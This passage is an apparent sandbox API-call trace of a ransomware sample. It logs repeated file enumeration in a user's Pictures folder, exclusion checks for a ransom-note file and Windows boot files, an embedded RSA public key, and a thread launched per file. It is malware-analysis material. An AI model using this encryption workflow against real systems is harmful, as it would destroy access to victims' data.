lpSrch="ntldr") returned 0x0 [0193.945] StrStrW (lpFirst="BD094FF047045CCAB6A2A1584B394112.XZZX", lpSrch="NTLDR") returned 0x0 [0193.945] StrStrW (lpFirst="BD094FF047045CCAB6A2A1584B394112.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0193.945] StrStrW (lpFirst="BD094FF047045CCAB6A2A1584B394112.XZZX", lpSrch="ntdetect.com") returned 0x0 [0193.945] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0193.945] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0193.945] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0193.945] lstrcpyW (in: lpString1=0x17cf1c, lpString2="BD094FF047045CCAB6A2A1584B394112.XZZX" | out: lpString1="BD094FF047045CCAB6A2A1584B394112.XZZX") returned="BD094FF047045CCAB6A2A1584B394112.XZZX" [0193.945] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0193.945] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xce8 [0193.946] Sleep (dwMilliseconds=0x96) [0194.100] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0194.100] lstrcmpW (lpString1="C22D6D6701D063BFF430045506304807.XZZX", lpString2="..") returned 1 [0194.101] lstrcmpW (lpString1="C22D6D6701D063BFF430045506304807.XZZX", lpString2=".") returned 1 [0194.101] StrStrW (lpFirst="C22D6D6701D063BFF430045506304807.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0194.101] StrStrW (lpFirst="C22D6D6701D063BFF430045506304807.XZZX", lpSrch="ntldr") returned 0x0 [0194.101] StrStrW (lpFirst="C22D6D6701D063BFF430045506304807.XZZX", lpSrch="NTLDR") returned 0x0 [0194.101] StrStrW (lpFirst="C22D6D6701D063BFF430045506304807.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0194.101] StrStrW (lpFirst="C22D6D6701D063BFF430045506304807.XZZX", lpSrch="ntdetect.com") returned 0x0 [0194.101] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0194.101] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0194.101] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0194.101] lstrcpyW (in: lpString1=0x17cf1c, lpString2="C22D6D6701D063BFF430045506304807.XZZX" | out: lpString1="C22D6D6701D063BFF430045506304807.XZZX") returned="C22D6D6701D063BFF430045506304807.XZZX" [0194.101] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0194.101] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xcec [0194.101] Sleep (dwMilliseconds=0x96) [0194.256] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0194.256] lstrcmpW (lpString1="C30CF4F82E58715357484B18328D559B.XZZX", lpString2="..") returned 1 [0194.256] lstrcmpW (lpString1="C30CF4F82E58715357484B18328D559B.XZZX", lpString2=".") returned 1 [0194.257] StrStrW (lpFirst="C30CF4F82E58715357484B18328D559B.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0194.257] StrStrW (lpFirst="C30CF4F82E58715357484B18328D559B.XZZX", lpSrch="ntldr") returned 0x0 [0194.257] StrStrW (lpFirst="C30CF4F82E58715357484B18328D559B.XZZX", lpSrch="NTLDR") returned 0x0 [0194.257] StrStrW (lpFirst="C30CF4F82E58715357484B18328D559B.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0194.257] StrStrW (lpFirst="C30CF4F82E58715357484B18328D559B.XZZX", lpSrch="ntdetect.com") returned 0x0 [0194.257] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0194.257] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0194.257] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0194.257] lstrcpyW (in: lpString1=0x17cf1c, lpString2="C30CF4F82E58715357484B18328D559B.XZZX" | out: lpString1="C30CF4F82E58715357484B18328D559B.XZZX") returned="C30CF4F82E58715357484B18328D559B.XZZX" [0194.257] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0194.257] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xcf0 [0194.257] Sleep (dwMilliseconds=0x96) [0194.413] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0194.413] lstrcmpW (lpString1="C355F5402BEDF72E504955A0300EDB76.XZZX", lpString2="..") returned 1 [0194.413] lstrcmpW (lpString1="C355F5402BEDF72E504955A0300EDB76.XZZX", lpString2=".") returned 1 [0194.413] StrStrW (lpFirst="C355F5402BEDF72E504955A0300EDB76.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0194.413] StrStrW (lpFirst="C355F5402BEDF72E504955A0300EDB76.XZZX", lpSrch="ntldr") returned 0x0 [0194.413] StrStrW (lpFirst="C355F5402BEDF72E504955A0300EDB76.XZZX", lpSrch="NTLDR") returned 0x0 [0194.413] StrStrW (lpFirst="C355F5402BEDF72E504955A0300EDB76.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0194.413] StrStrW (lpFirst="C355F5402BEDF72E504955A0300EDB76.XZZX", lpSrch="ntdetect.com") returned 0x0 [0194.413] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0194.413] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0194.413] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0194.413] lstrcpyW (in: lpString1=0x17cf1c, lpString2="C355F5402BEDF72E504955A0300EDB76.XZZX" | out: lpString1="C355F5402BEDF72E504955A0300EDB76.XZZX") returned="C355F5402BEDF72E504955A0300EDB76.XZZX" [0194.413] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0194.413] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xcf4 [0194.414] Sleep (dwMilliseconds=0x96) [0194.568] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0194.569] lstrcmpW (lpString1="C87868381959CC9C63DBF2EC1D8EB0E4.XZZX", lpString2="..") returned 1 [0194.569] lstrcmpW (lpString1="C87868381959CC9C63DBF2EC1D8EB0E4.XZZX", lpString2=".") returned 1 [0194.569] StrStrW (lpFirst="C87868381959CC9C63DBF2EC1D8EB0E4.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0194.569] StrStrW (lpFirst="C87868381959CC9C63DBF2EC1D8EB0E4.XZZX", lpSrch="ntldr") returned 0x0 [0194.569] StrStrW (lpFirst="C87868381959CC9C63DBF2EC1D8EB0E4.XZZX", lpSrch="NTLDR") returned 0x0 [0194.569] StrStrW (lpFirst="C87868381959CC9C63DBF2EC1D8EB0E4.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0194.569] StrStrW (lpFirst="C87868381959CC9C63DBF2EC1D8EB0E4.XZZX", lpSrch="ntdetect.com") returned 0x0 [0194.569] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0194.569] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0194.569] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0194.569] lstrcpyW (in: lpString1=0x17cf1c, lpString2="C87868381959CC9C63DBF2EC1D8EB0E4.XZZX" | out: lpString1="C87868381959CC9C63DBF2EC1D8EB0E4.XZZX") returned="C87868381959CC9C63DBF2EC1D8EB0E4.XZZX" [0194.569] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0194.569] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xcf8 [0194.570] Sleep (dwMilliseconds=0x96) [0194.725] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0194.725] lstrcmpW (lpString1="D2FBB85013E759FE97CF4AF0181D3E46.XZZX", lpString2="..") returned 1 [0194.725] lstrcmpW (lpString1="D2FBB85013E759FE97CF4AF0181D3E46.XZZX", lpString2=".") returned 1 [0194.725] StrStrW (lpFirst="D2FBB85013E759FE97CF4AF0181D3E46.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0194.725] StrStrW (lpFirst="D2FBB85013E759FE97CF4AF0181D3E46.XZZX", lpSrch="ntldr") returned 0x0 [0194.725] StrStrW (lpFirst="D2FBB85013E759FE97CF4AF0181D3E46.XZZX", lpSrch="NTLDR") returned 0x0 [0194.725] StrStrW (lpFirst="D2FBB85013E759FE97CF4AF0181D3E46.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0194.725] StrStrW (lpFirst="D2FBB85013E759FE97CF4AF0181D3E46.XZZX", lpSrch="ntdetect.com") returned 0x0 [0194.725] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0194.725] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0194.725] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0194.725] lstrcpyW (in: lpString1=0x17cf1c, lpString2="D2FBB85013E759FE97CF4AF0181D3E46.XZZX" | out: lpString1="D2FBB85013E759FE97CF4AF0181D3E46.XZZX") returned="D2FBB85013E759FE97CF4AF0181D3E46.XZZX" [0194.725] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0194.725] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xcfc [0194.726] Sleep (dwMilliseconds=0x96) [0194.880] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0194.880] lstrcmpW (lpString1="D3D882303025B5406F9968D234469988.XZZX", lpString2="..") returned 1 [0194.881] lstrcmpW (lpString1="D3D882303025B5406F9968D234469988.XZZX", lpString2=".") returned 1 [0194.881] StrStrW (lpFirst="D3D882303025B5406F9968D234469988.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0194.881] StrStrW (lpFirst="D3D882303025B5406F9968D234469988.XZZX", lpSrch="ntldr") returned 0x0 [0194.881] StrStrW (lpFirst="D3D882303025B5406F9968D234469988.XZZX", lpSrch="NTLDR") returned 0x0 [0194.881] StrStrW (lpFirst="D3D882303025B5406F9968D234469988.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0194.881] StrStrW (lpFirst="D3D882303025B5406F9968D234469988.XZZX", lpSrch="ntdetect.com") returned 0x0 [0194.881] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0194.881] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0194.881] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0194.881] lstrcpyW (in: lpString1=0x17cf1c, lpString2="D3D882303025B5406F9968D234469988.XZZX" | out: lpString1="D3D882303025B5406F9968D234469988.XZZX") returned="D3D882303025B5406F9968D234469988.XZZX" [0194.881] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0194.881] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd00 [0194.882] WaitForSingleObject (hHandle=0xd00, dwMilliseconds=0xffffffff) returned 0x0 [0194.883] Sleep (dwMilliseconds=0x96) [0195.037] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.037] lstrcmpW (lpString1="D59AAFC73FFFF3FE126A516D4420D846.XZZX", lpString2="..") returned 1 [0195.037] lstrcmpW (lpString1="D59AAFC73FFFF3FE126A516D4420D846.XZZX", lpString2=".") returned 1 [0195.037] StrStrW (lpFirst="D59AAFC73FFFF3FE126A516D4420D846.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0195.037] StrStrW (lpFirst="D59AAFC73FFFF3FE126A516D4420D846.XZZX", lpSrch="ntldr") returned 0x0 [0195.037] StrStrW (lpFirst="D59AAFC73FFFF3FE126A516D4420D846.XZZX", lpSrch="NTLDR") returned 0x0 [0195.037] StrStrW (lpFirst="D59AAFC73FFFF3FE126A516D4420D846.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0195.037] StrStrW (lpFirst="D59AAFC73FFFF3FE126A516D4420D846.XZZX", lpSrch="ntdetect.com") returned 0x0 [0195.037] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0195.037] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0195.037] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0195.037] lstrcpyW (in: lpString1=0x17cf1c, lpString2="D59AAFC73FFFF3FE126A516D4420D846.XZZX" | out: lpString1="D59AAFC73FFFF3FE126A516D4420D846.XZZX") returned="D59AAFC73FFFF3FE126A516D4420D846.XZZX" [0195.037] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0195.037] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd04 [0195.038] Sleep (dwMilliseconds=0x96) [0195.192] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0195.192] lstrcmpW (lpString1="D5D72CD040472A6053677EF544680EA8.XZZX", lpString2="..") returned 1 [0195.193] lstrcmpW (lpString1="D5D72CD040472A6053677EF544680EA8.XZZX", lpString2=".") returned 1 [0195.193] StrStrW (lpFirst="D5D72CD040472A6053677EF544680EA8.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0195.193] StrStrW (lpFirst="D5D72CD040472A6053677EF544680EA8.XZZX", lpSrch="ntldr") returned 0x0 [0195.193] StrStrW (lpFirst="D5D72CD040472A6053677EF544680EA8.XZZX", lpSrch="NTLDR") returned 0x0 [0195.193] 